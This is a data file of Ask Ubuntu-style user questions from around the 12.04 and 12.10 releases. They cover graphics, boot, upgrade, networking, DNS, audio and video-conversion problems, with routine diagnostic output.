270367	graphic problems on nokia booklet 3g	after installation ( no problems ) of the latest ubuntu version ( 12.04 lts ) on my `` nokia booklet 3g '' , i got problems with the monitor . when i started my nokia , i got a black sceen and after a while i have a kind of splitted screen ... in the upper half of the monitor i can see the half of my wallpaper of the desktop and the lower half of the screen shows me grey color ... sometimes the monitor flickers . i think , there is a problem with the graphics driver . i already searched in different forums worldwide , but did n't found a useful answer for that problem . well , ubuntu professionals ... do you have the final answer ? i have to say , that i am a linux beginner and i would really appreciate a practical solution . thank you very much in advance . kazu
270370	how can i disable graphical boot , yet start x during boot ?	my question i am not attached to the splashscreen or whatever . how can i configure a non-graphical boot that still takes me to the login screen ? in other words , i do want x to start as the last thing in the boot process , but i do not need any other tools ( plymouth or userspace bootsplash or whatever ) . my problem i get a blank/purple screen at undefined times when use the battery or when i have used it . i have a lenovo easypad z580 . at times the problem also occurs after a suspend . in that case it states something like userspace bootsplash stopped . my research i read and tried the solutions in the following pages : https : //wiki.ubuntu.com/x/troubleshooting/blankscreen https : //wiki.ubuntu.com/x/troubleshooting/freeze https : //wiki.ubuntu.com/x/nongraphicalboot my computer boots to a black screen , what options do i have to fix it ? i already disabled plymouth . i do not think that this question is a duplicate ( because i want a non-graphical boot , yet a graphical desktop ) . but i might be mistaking . also my scenario is none of the ones proposed in my computer boots to a black screen , what options do i have to fix it ? ( if you are trying to install ubuntu , if you have a dual boot system , if an update or something else caused your problem ) .
270373	installing ubuntu 12.10 as primary os ?	i have an old computer which currently runs windows xp . i want to give ubuntu ( v12.10 ) a try since i heard that it requires less ram than xp to operate . here are its specs : os : windows xp ram : 1gb hdd : 40gb graphics : ati radeon 7000 64mb processor : intel pentium iv 2.0 ghz can someone give me advice on how to install ubuntu ? i wish to install it on the entire disk with no partitions whatsoever and to permanently delete windows xp . are the specs of my pc enough to smoothly run ubuntu and at the same time do some basic tasks ( document editing , internet browsing , music , videos and some old games ) ? will ubuntu have the drivers for my hardware ? thank you very much !
270374	possible to run a script when something plugged in / disconnected from mini displayport ?	in /etc/acpi/ there are several scripts that can be customized to do something when a particular event happens on your physical computer , like the lid.sh script which is called when the laptop lid is opened or closed , but i 'm looking for a way to detect when something is plugged into or disconnected from the mini displayport , so that i can run a command . i do n't see any such script in there ( unless i 've missed something ) . the command would be to configure the multi-monitor setup automatically using xrandr . this used to happen automatically in gnome ( using ~/.config/monitors.xml i believe ) but i 've now switched to xmonad completely and it does n't automatically detect this .
270379	is it possible for /etc/hosts to include a file from my home directory ?	i would like to setup ubuntu one to sync a hosts file in my home directory between my machines . ideally i would setup all my local web development urls there and it would just sync between devices . but i 'm wondering if it 's possible for me to setup /etc/hosts so that it includes a file from my user 's home directory .
270381	how do i install ncurses header files ?	i was trying to configure the kernel and i got the following error . can somebody please tell me what should i do ? root @ nitr-desktop : /usr/src/linux # make menuconfig *** unable to find the ncurses libraries or the *** required header files . *** 'make menuconfig ' requires the ncurses libraries . *** *** install ncurses ( ncurses-devel ) and try again . *** make [ 1 ] : *** [ scripts/kconfig/dochecklxdialog ] error 1 make : *** [ menuconfig ] error 2
270382	unable to save scripts from the python interpreter	i have installed ubuntu and it came with python 2.7.3 but i ca n't save any of my programs . i tried going to file , looking for a save option , but it is not present . what should i do ?
270384	set headphone as output when they are inserted	i am having a bit of a problem with my headphones on my macbook 2.1 . for reference : the top output are my speakers , the bottom are my headphones , but the middle does not work . when i plug in my headphones , the middle output is selected . my question : is there any way to set the analog ( bottom ) as output whenever the headphones are plugged in ?
270389	how can i disable the spam notification from a known contact in thunderbird ?	i am running thunderbird mail on ubuntu 12.10 . how can i un-mark the spam notification from known contacts ?
270393	dvd and vcd to mp3	is there any package that allows me to rip the dvd and vcd to mp3 . i have few dvd and vcds that i would like to put into mp3 disc . recording in software like audacity is not an option for me . commandline or gui that does not matter as long as it works
270394	access shared folders on an ubuntu host and a windows xp guest	i have installed virtualbox 4.1.18 on ubuntu 12.10 and i hosted windows xp . i want to share a folder between ubuntu and windows xp . i have installed guest additions on the guest machine , and then when i 'm trying to acces the shared folder , i could n't find them anywhere . so , where can i acces those shared folders ?
270396	10.04 - > 12.04 upgrade . server . do-release-upgrade fail . what sources to change	i am current trying to upgrade a ubuntu server via ssh . i am stuck since i can not perform a do-release-upgrade . it tries maverick instead of trying 12.04 essentially i think he is failing because 12.04 is an old release . i had to change /var/lib/update-manager/meta-release to start using old-releases mirrors instead of archive since it was failing before with another problem . my sources : http : //pastebin.com/xrftakjn my /var/lib/update-manager/meta-release : http : //pastebin.com/a3zs6dyx what is wrong ? my error : checking for a new ubuntu release done upgrade tool signature done upgrade tool done downloading authenticate 'maverick.tar.gz ' against 'maverick.tar.gz.gpg ' extracting 'maverick.tar.gz ' tar : removing leading `/ ' from member names reading cache checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done reading package lists ... done building dependency tree reading state information ... done building data structures ... done updating repository information warning : failed to read mirror file 35 % [ working ] error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick/main/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick/restricted/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick/restricted/source/sources.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick-updates/main/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick-updates/main/source/sources.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/source/sources.gz 404 not found [ ip : 91.189.92.202 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/source/sources.gz 404 not found [ ip : 91.189.92.202 80 ] , e : some index files failed to download , they have been ignored , or old ones used instead . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done
270397	aptitude upgrade linux 3.2.0-39 problem	since yesterday i am trying to upgrade my system to the latest version . i am using ubuntu server 12.04.2 lts . the strangest thing happens when i try to upgrade my system . here is the output of aptitude upgrade frank @ spoon : ~ $ sudo aptitude upgrade the following partially installed packages will be configured : initramfs-tools linux-generic linux-image-3.2.0-39-generic linux-image-generic linux-image-server no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-39-generic ( 3.2.0-39.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) use of chdir ( '' ) or chdir ( undef ) as chdir ( ) is deprecated at /var/lib/dpkg/info/linux-image-3.2.0-39-generic.postinst line 235 . failed to symbolic-link /boot/initrd.img-3.2.0-39-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-3.2.0-39-generic.postinst line 614. dpkg : error processing linux-image-3.2.0-39-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 no apport report written because maxreports has already been reached dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.39.47 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not configured yet . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic e : /usr/share/initramfs-tools/hooks/ntfs_3g failed with return 1. update-initramfs : failed for /boot/initrd.img-3.2.0-38-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-3.2.0-39-generic linux-image-generic linux-generic linux-image-server initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-39-generic ( 3.2.0-39.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) use of chdir ( '' ) or chdir ( undef ) as chdir ( ) is deprecated at /var/lib/dpkg/info/linux-image-3.2.0-39-generic.postinst line 235 . failed to symbolic-link /boot/initrd.img-3.2.0-39-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-3.2.0-39-generic.postinst line 614. dpkg : error processing linux-image-3.2.0-39-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not configured yet . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.39.47 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic e : /usr/share/initramfs-tools/hooks/ntfs_3g failed with return 1. update-initramfs : failed for /boot/initrd.img-3.2.0-38-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-image-3.2.0-39-generic linux-image-generic linux-image-server linux-generic initramfs-tools the stranges thing is when i look in my home folder i see symlinks /boot/vmlinuz-3.2.0-39-generic and to /boot/initrd.img-3.2.0-39-generic . here a listing of my home folder . frank @ spoon : ~ $ ls documents dotfiles downloads initrd.img insync insync.bak iso music shares tmp virtualbox vmlinuz wallpapers workspace frank @ spoon : ~ $ this is a listing of my / root folder . what the hell is initrd.img.8579 frank @ spoon : / $ ll total 96 drwxr-xr-x 23 root root 4096 mar 19 23:13 ./ drwxr-xr-x 23 root root 4096 mar 19 23:13 ../ drwxr-xr-x 2 root root 4096 mar 19 21:48 bin/ drwxr-xr-x 3 root root 4096 mar 20 13:36 boot/ drwxr-xr-x 17 root root 4340 mar 20 13:30 dev/ drwxr-xr-x 140 root root 12288 mar 20 13:30 etc/ drwxr-xr-x 3 root root 4096 jan 22 20:43 home/ lrwxrwxrwx 1 root root 33 mar 3 11:10 initrd.img.8579 - > /boot/initrd.img-3.2.0-38-generic lrwxrwxrwx 1 root root 33 jan 30 21:43 initrd.img.old - > /boot/initrd.img-3.2.0-36-generic drwxr-xr-x 22 root root 4096 mar 19 23:12 lib/ drwxr-xr-x 2 root root 4096 jan 27 13:08 lib64/ drwx -- -- -- 2 root root 16384 jan 22 20:36 lost+found/ drwxr-xr-x 3 root root 4096 jan 22 20:37 media/ drwxr-xr-x 4 root root 4096 mar 4 19:36 mnt/ drwxr-xr-x 2 root root 4096 jan 22 20:36 opt/ dr-xr-xr-x 131 root root 0 mar 20 13:30 proc/ drwx -- -- -- 9 root root 4096 mar 20 13:03 root/ drwxr-xr-x 22 root root 780 mar 20 13:32 run/ drwxr-xr-x 2 root root 4096 mar 19 23:12 sbin/ drwxr-xr-x 2 root root 4096 mar 5 2012 selinux/ drwxr-xr-x 3 root root 4096 mar 4 20:02 srv/ drwxr-xr-x 13 root root 0 mar 20 13:30 sys/ drwxrwxrwt 15 root root 4096 mar 20 13:36 tmp/ drwxr-xr-x 11 root root 4096 mar 4 20:01 usr/ drwxr-xr-x 12 root root 4096 mar 20 13:15 var/ lrwxrwxrwx 1 root root 29 mar 3 11:10 vmlinuz - > boot/vmlinuz-3.2.0-38-generic lrwxrwxrwx 1 root root 29 jan 30 21:43 vmlinuz.old - > boot/vmlinuz-3.2.0-36-generic as i said it is very very odd . and i do n't know anymore what to do , that 's why i wrote the question on stackoverflow . thanks for any help , avoiding me to have to reinstall the entire system , which would take a while . thanks a lot
270402	ubuntu 12.10 just killed wine & zsnes	my system just did a partial upgrade . i was busy doing something else so just let it get on with things . now it has removed wine and zsnes and wo n't allow me to reinstall them ! is there a way to `` roll back '' to before this stupid partial upgrade ?
270403	why would 12.04 ( 64bit ) work , when 12.10 ( 64bit ) does n't ?	the problem is , that running and installing 12.10 does n't work . i 've done following tests : installed 12.10 32-bit . it 's working . installed 12.04 lts 64-bit . it 's working . upgrading from 12.04 64bit , to 12.10 using do-release-upgrade -d. this did not work . burn a 12.10 64-bit cd . installed to another pc , which worked . but booting this to the pc did n't recognize this . the error message is : `` no operating system found '' . it the proceeds to boot from 2nd priority . the pc is a packard bell easynote lm : amd phenom ii x2 n660 6gb ddr3 ram 640 gb hdd .
270407	how do i migrate currently installed ubuntu to a virtual machine ?	i 'm finding that my graphics drivers ( ati radeon hd 4200 ) run much better in a native windows system , i ca n't even get the closed-source drivers working in ubuntu , thus leading me to want to run windows as my main os again but have ubuntu in a vm . anyone know how i could migrate my current ubuntu system to a vm ?
270409	can i install ubuntu on my phone ( sony ericsson w8 ) ?	can i install ubuntu operating system on my phone ( sony ericsson w8 ) ? how to install ? does it work properly ?
270415	unity plugin - ca n't rebind the launcher button	i 'm running 12.04 and i 'd like to use my super as the button to open the launcher , currently i 'm using super + tab to essentially open the first item in the launcher . i have the compiz tools installed , and i 've tried editing the launcher button , but as soon as i set it , it changes back to 'disabled ' . does anyone have any idea how i can find out if the button is already bound , or force it in some way ? i 'd like to be able to use it to see the shortcut help window also . it seems that this also stops all keyboard shortcuts using the super key as seen here , http : //www.webupd8.org/2012/01/unity-gets-shortcut-hints-overlay-and.html update one i 've changed the super key in my keyboard settings to be 'meta ' which seems to have made a difference , but i still ca n't rebind that launcher shortcut update two looks like this is a bug , https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/1151786
270416	how do fn keys work ?	i like to know how fn keys work in my laptop . i think a kernel module exist that catch fn key and call some scripts to do something . in my laptop , fn+f2 switch power of wireless and blue-tooth . this is output of acpi_listen , when i press fn+f2 hotkey atkd 0000005d 00000019 hotkey atkd 0000007e 00000009 and , folloing is output of xev for fn+f2 keycode 238 press keycode 238 release keycode 237 press keycode 237 release i guess whenever i pressed fn+f2 two events are jumped out . i tried to find what actions are executed for this keys . any idea appreciated ; )
270417	how do i change /etc/resolv.conf ?	i am using ubuntu 12.04 . how do i change /etc/resolv.conf file ? every time i edit it , it automatically gets reset . if i want to retain changes in the file what needs to be done . when i browsed through internet i found some solutions one of them was : adding the nameserver to /etc/resolvconf/resolv.conf.d/head adding the nameserver to /etc/resolvconf/resolv.conf.d/base but even after adding the nameserver to above mentioned files and restarting the services , the /etc/resolv.conf automatically gets reset . i want to permanently retain changes in /etc/resolv.conf file .
270424	failed to load file amd-ucode/micrcode_amd.bin kickstart vm	new kickstart iso.. when i restart my ubunutu server i get the following error ubuntu failed to load file amd-ucode/microcode_amd.bin i tried to search for the file on my `` regularly '' installed ubunutu-server but i could n't find it.. and i do n't get the error message when i reboot it
270430	why have i lost the 2.1 sound settings on my asus n76vz dh71 ?	i 've just got the asus n76vz dh71 with a sonicmaster subwoofer . i got the output on the sonicmaster , but essential its a right channel , not the sub . i was following : no sound from external subwoofer `` sonic master '' on an asus n76vm and asus_n55sf on wiki.archlinux.org to try to fix the intel audio bug , but after reboot , ubuntu does not see any audio device at all . i had to remove the new 2.1 mapping in extra-hdmi.conf in order to have it work again . the intel card here is 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 )
270431	i can not password protect logging into my account	when i start up ubuntu , i see the login screen . i have my account and a guest account as the choices . when i choose my account by clicking on it , i automatically get logged in with out being required to enter my password . i want to password protect my account so when someone clicks my account , they have to enter the proper password to get in . i have tried to do this by going to settings > user accounts > my account and pressing the unlock button in the top right corner of the window . i get the authentication is required to change user data pop up and i enter my password to get access . this is what i see . ( i 've blacked out my account name ) as you can see automatic login is set to off but like i said , when i click my account from the login screen i get automatically logged in with out requiring a password . i guess that is not what they mean by automatic login . update 1 : the user rinzwind explained to me how ubuntu on/off switches work so i made sure that it was set it to off but when i restart , i get automatically logged in . then when i open my user account and look at automatic login , it is set to on again . something , maybe a setting in a script , is resetting automatic login back to on . any ideas on why this is happening ? update 2 : the user rinzwind suggested i see if anything changes in the /etc/lightdm/lightdm.conf when i switch automatic login - > on and off . i did that and did see a change . when i set automatic login to off the lightdm.conf file looks like this : [ seatdefaults ] autologin-guest=false autologin-user=max autologin-user-timeout=0 autologin-session=lightdm-autologin user-session=ubuntu greeter-session=unity-greeter but when i set automatic login to on the lightdm.conf file looks like this : [ seatdefaults ] autologin-guest=false autologin-user= autologin-user-timeout=0 autologin-session=lightdm-autologin user-session=ubuntu greeter-session=unity-greeter max @ siddhion : ~ $ so as you can see the difference is that when automatic login is on autologin-user equals nothing but , when off , autologin-user equals max which is me . not sure what difference this makes since even when i set it to off , i still get logged in automatically . any ideas ? note 1 when i suspend my laptop and return to it again , i am presented with a prompt to enter my password to access my account . so at least that is working . the problem i am having is when the laptop restarts . note 2 when my account loads up i always get a pop up saying i have to type in my password to unlock the keyring . not sure if that is important here .
270432	ubuntu suspended - external harddrive no longer powers ?	i recently got a new laptop and i 've just installed ubuntu 12.04 on it . i went to transfer files over from my old laptop using my external hard drive and closed the lid when i went away , forgetting i had n't changed the power settings to do nothing when the lid is closed , so the laptop suspended . when i reopened the lid , later on , i realised this and got errors that the folders could not be transferred anymore as they did not exist . my external harddrive is no longer powering up . is this normal ? can it be fixed ?
270433	iostat shows very little written data while installing and updating	i upgraded my t60 with a crucial v4 128gb . have done all the tweaks ( scheduler , discard , noatime , nodirtime ) and i 'm finding that installing anything is very slow . right now i 'm installing some updates and out of curiousity checked iostat and found that while downloading updates , the drive is active , kb_writn/s shows large numbers but right now , in `` applying changes '' phase iostat bounces between 0 and 200 , but is mainly at 0.00 . hdd light has been on for the whole time . what could be causing it ? thanks in advance !
270435	how to run ubuntu without gui in virtual box ?	i have a windows xp laptop , in which i run virtualbox with the latest ubuntu , my hardware is little old , so running the latest version of ubuntu inside virtual box is kind of a hassle , very slow performances , even if all i 'm doing is running the terminal and practicing linux commands ! i tried dsl ( damn small linux ) with my virtualbox , very small distro ( 50 mb ) , i am satisfied with how faster is my system now , but i miss ubuntu , moreover , dsl is missing too many commands , such as sed an many others that i ca n't remember . is it possible to run ubuntu just in console mode , no gui or minimum gui ... no nice effects no fancy graphics ? a link / tutorial would be much appreciated .
270437	local hostname resolution with local ubuntu dns server fails	so i will start with the fact i wasted the whole day trying to figure that out with no results ... i have a small local network behind a nat router . it goes like this : isp- > nat router ( contains a wireless part and ethernet ports ) - > my computer ( wired ) , my laptop ( wireless ) , my mom 's computer ( wireless ) , and my server ( wired ) . before i installed the ubuntu server i had whs1 for backups only , my dhcp was the router , dns - set to router 's ip which had the isp 's dns servers set . yesterday i decided to switch to ubuntu server . i installed the dhcp server on ubuntu , configured it completely , everything works . it 's hostname is 'ubuntuserver ' and the domain ( i think that 's what it is ) is 'home ' . then i set up the server to be a dns server as well to cache the answers from an external dns servers ( google 's and opendns ) . the problem is that i just ca n't get to ping internal hostnames in my local network ( e.g . from my computer 'ping ubuntuserver'/vice versa - > unknown host ) . now i know that all what i 've configured has nothing to do with it because these are external dns server . i know there is the hosts file , but i do not want to configure it in each pc , my question is - where/how i configure a table on the server so all the local machine will identify hostnames ? it fails in ping hostname and dig hostname ... when 'ping ubuntuserver.local ' it works . long story short - doing 'ping ubuntuserver ' doesnt work , doing 'ping ubuntuserver.local ' does work . where do i configure on the server a table for local address resolution so it applies for all local machines connected to the dns ? edit : well , i deleted bind9 because i found out that it 's name caching is not worth it . i figured out i do n't mind using `` ping hostname.local '' instead of `` ping hometaname '' and configuring a zone file is too much trouble just for a 4 computers lan .
270440	connecting to wifi from ubuntu 12.10	having an issue connecting to the comcast xfinity wifi ( only my home network , laptop can connect to other wifi networks ) . ubuntu shows that connection is established , i can access internet/my router for a few seconds , then no data is coming back ( ping 10.0.0.1 shows 30 % package loss as soon as i connect , goes to 100 % after a few seconds and says destination host unreachable later ) . default gateway is set to 10.0.0.1 , which is router address . mac address is the same too . called comcast support , they did reset my router few times , i power cycled it multiple times as well . acer aspire v3 ubuntu 12.10 x64 dual boot with windows 8 ( preinstalled , uefi ) router arris interactive , l.l.c . tg862g dmesg output : http : //bpaste.net/show/1a3bjl4cvceursoc1eh9/ ifconfig -a eth0 link encap : ethernet hwaddr 70:54 : d2 : a6:79:44 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:123 errors:0 dropped:0 overruns:0 frame:0 tx packets:123 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10867 ( 10.8 kb ) tx bytes:10867 ( 10.8 kb ) wlan0 link encap : ethernet hwaddr 20:16 : d8 : a6:4b : c9 inet addr:10.0.0.10 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :2216 : d8ff : fea6:4bc9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:60 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1051 ( 1.0 kb ) tx bytes:10840 ( 10.8 kb ) and iwconfig wlan0 ieee 802.11abgn essid : '' osipov-wifi '' mode : managed frequency:2.462 ghz access point : 00:1d : d4 : fa:28:60 bit rate=130 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=70/70 signal level=-30 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1 invalid misc:0 missed beacon:0 any steps i can take ? edit : also tried fiddling with wifi security settings .
270445	how do i obtain updates on ubuntu server ?	i 've used ubuntu desktop before but not the server . on the desktop the update manager automatically checks for updates ( and allows them to be installed ) but how do we do this on the server version ?
270452	disk failure is imminent	ok , i have one question , i got an error that my disk failure is imminent , i tryed everything possible to recover it but not success . then i completelly removed my ubuntu 12.04 by installing windows xp instead , but for some reasons , it now work fully with windows xp , but again suffers problems with ubuntu , displaying same message . is there any fix possible , please answer me quickly , i can not use windows i dont know lot to use it it s so hard . please help to back my best linux ever ! ! ! !
270456	need help for locking down linux desktop	good morning all . so i work with a disabled guy and he has a computer . this guy asked for assistance , i put windows xp on his computer and i discovered that he loves deleting files ( he managed to delete the system making it impossible to boot ... ) i decided to try ubuntu , it will be a better solution than windows xp i 'm sure he will love the colors ... i want to lock down his account to absolutely block pornography access , block any way that he can delete applications or install new ones . i also want to lock the desktop so that he ca n't delete the icons or change wallpaper or whatever ... otherwise he will empty the desktop change the wallpaper and come again and again . it will be extremely nice if some one could have the patience to solve my problem . thanks in advance . edit : so the thing if he find a way changing the wallpaper he wo n't be abble to put it back and will probably delete or watever ... and in the desktop as i know you have the shortcuts for the applications like google chrome ... if he delete i do n't even know were linux put the applications once installed ^^ ' . and is there any `` parental control '' ? edit : thanks : )
270457	ubuntu 10.04 updating mod_wsgi to version 3.4 : still shows 2.8	i 've followed instructions on how to update mod_wsgi to latest version on ubuntu 10.04 ? and https : //www.digitalocean.com/community/articles/installing-mod_wsgi-on-ubuntu-12-04 after an apache restart and a dpkg -l | grep wsgi i still see : ii libapache2-mod-wsgi 2.8-2ubuntu1 looking in /usr/lib/apache2/modules the mod_wsgi.so was modified today , so i assume it is the correct version but ca n't say for sure ( is there a way to check ? ) . my mods-available/mod_wsgi.load shows the path to the recently modified /usr/lib/apache2/modues/mod_wsgi.so am i missing configuring something else , be it apache or otherwise , that would cause this module not to be updated ?
270458	suspend problem associated with ethernet on ubuntu 12.10	i have an asus vivobook s200 with ubuntu 12.10 64bit on it . i have the following problem . after booting the laptop the ethernet works and if i click suspend it works normally . then when i wake the laptop and i log in everything works fine except for the ethernet , which seems to be completely dead ( if i go to network preferences it 's always saying `` cable disconnected '' ) . another anomaly is that after this first time suspend does n't work anymore , instead i get some error messages ( which appear for a brief period of time ) and then the system goes back to the login screen . i 've managed to grab a screen of the error messages as far is i 've understood these errors are related to the ethernet , so the ethernet not working and the impossibility to suspend are probably related . i 'm a linux newbie so i need help . thanks in advance
270462	how to upgrade ubuntu 12.04 lts to 12.10 ?	i want to know , how to upgrade ubuntu 12.04 lts to 12.10 . is there an upgrade feature or need i download 12.10 and install ?
270464	i get an error when trying to convert video	i m trying to convert mp4 video file to avi file with ffmpeg -i 10.mp4 -vcodec mpeg4 -vtag xvid -b 990k -bf 2 -g 300 -s 640x360 -acodec libmp3lame -ab 128k -ar 48000 -ac 2 -pass 2 -f avi 10.avi but i get the following error can not read file 'ffmpeg2pass-0.log ' : no such file or directory error reading log file 'ffmpeg2pass-0.log ' for pass-2 encoding any suggestion to avoid this problem ?
270466	problem with wubi.exe	i tried to install ubuntu using wubi ( 12.10 ) but it does n't work . my desktop configuration is windows.7 hdd.capacity:500gb. , ram capacity:3gb , processor : intel dual core:2.xghz . i do n't know why it fails . it proceeds till some 75 % to 80 % of installation and fails at that stage . could some body help me . even i tried other wubi versions too ( eg. , 12.04 . etc. , ) note : while intalling it shows amd64 installer . but in ubuntut website we are not provided with any options to choose our architecture except the operating system .
270468	any application with graphical user interface to convert video files from mp4 to avi ?	i 'm using ubuntu and i have some mp4 video files and i want to convert them to avi video file and i 'm looking for an application to do it . i want an application with graphical user interface . any suggestion ? i tried the command line ffmpeg but i get some problems
270469	how can i create a new profile for gnome terminal via command line ?	as everybody knows you can create a new profile by the menu where you get asked which existing profile should be the parent for your new profile and so on . but how should i create a new profile by the command line ? should i read every existing value from the default profile via gconftool and set them again under a new name or is there any better solution ? if the answer is yes : do i have to pay attention for the new profile name ? the new ones are always called profile0 , profile1 , profile2 etc .
270475	different partition layouts per group/tag	is there any way to define specific partition requirements ( or even better , separate preseed configurations ) per tags or per group in maas ? it is possible to do this in puppet+razor pretty easily , but i so far have not found any way to replicate this in maas . i 'll help test things if needed !
270477	can i remove rhythmbox without getting in trouble ?	since rhythmbox seems to be deeply integrated in ubuntu , can i just remove it ? or are there any side effects which i should aware of ? ps : using 12.10
270479	what is my dns server ?	my /etc/resolv.conf looks like this : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 # opendns fallback ( configured by linux mint in /etc/resolvconf/resolv.conf.d/tail ) . nameserver 208.67.222.222 nameserver 208.67.220.220 when i use nslookup , i seem to use 127.0.1.1 : moose @ pc08 ~ $ nslookup www.google.com server : 127.0.1.1 address : 127.0.1.1 # 53 non-authoritative answer : name : www.google.com address : 173.194.44.17 name : www.google.com address : 173.194.44.16 name : www.google.com address : 173.194.44.19 name : www.google.com address : 173.194.44.18 name : www.google.com address : 173.194.44.20 but when i right-click on network manager and click on `` connection information '' i get : whois 217.0.43.129 reveals that this belongs to deutsche telekom ag , my isp . why does network manager show this information ? what dns server am i currently using ? dnsmasq yes , i seem to run dnsmasq : moose @ pc08 ~ $ ps aux | grep dnsmasq nobody 1479 0.0 0.0 5468 1404 ? s 14:16 0:00 /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- no-hosts -- bind-interfaces -- pid-file=/var/run/sendsigs.omit.d/network-manager.dnsmasq.pid -- listen-address=127.0.1.1 -- conf-file=/var/run/nm-dns-dnsmasq.conf -- cache-size=0 -- proxy-dnssec -- enable-dbus=org.freedesktop.networkmanager.dnsmasq -- conf-dir=/etc/networkmanager/dnsmasq.d
270480	is it possible to hide the appmenu like ms windows can ?	the global menu seems to be not optimal for desktops , in my opinion . so i disabled it . now i 'm wondering if it is possible to hide the appmenu like ms windows does . of course , it ca n't treggered by pressing `` alt '' , because the hud uses this key . but is it even possible ? ps : using currently 12.10
270487	usb mouse does n't work with ubuntu	i installes ubuntu 12.10 , but i got a problem with my mouse . it 's a usb mouse , the drakonia sharkoon . it does n't work , i ca n't move it and also ca n't click something . but there are some keys on my mouse , when pressing one of the keys it should press `` 1 '' , those keys work . my touchpad is also working . could someone please help me ? kind regards
270488	is it possible to remove all the packages installed from a specific repository ?	i would like to remove every package that came from the multiverse repository . what is the best way to do this ?
270489	can i click away notifications ( notify-osd ) ?	is it possible to click away those fancy notifications ? often i have to wait until those bubbles vanish and that 's quite unproductive . ps : using currently 12.10
